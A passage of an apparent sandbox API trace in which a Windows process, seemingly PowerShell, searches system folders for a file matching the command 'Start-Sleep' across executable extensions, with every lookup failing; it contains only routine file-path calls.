[0264.364] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.365] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x28 [0264.421] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0264.421] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.422] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.422] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x28 [0264.423] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0264.423] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.423] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.424] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x28 [0264.425] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0264.425] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.425] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.426] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", lpFilePart=0x0) returned 0x27 [0264.427] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0264.427] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.427] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.428] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x28 [0264.429] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0264.429] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.429] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.429] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.430] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.431] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.432] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.WSF", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.432] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.433] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.434] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.WSH", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.435] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.435] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.436] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.437] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.438] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.439] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CPL", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.439] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.440] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.441] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.441] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.442] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.443] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.ps1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.444] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0264.444] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.444] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.445] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psm1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.445] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x3b [0264.446] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0264.446] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.446] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.447] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", 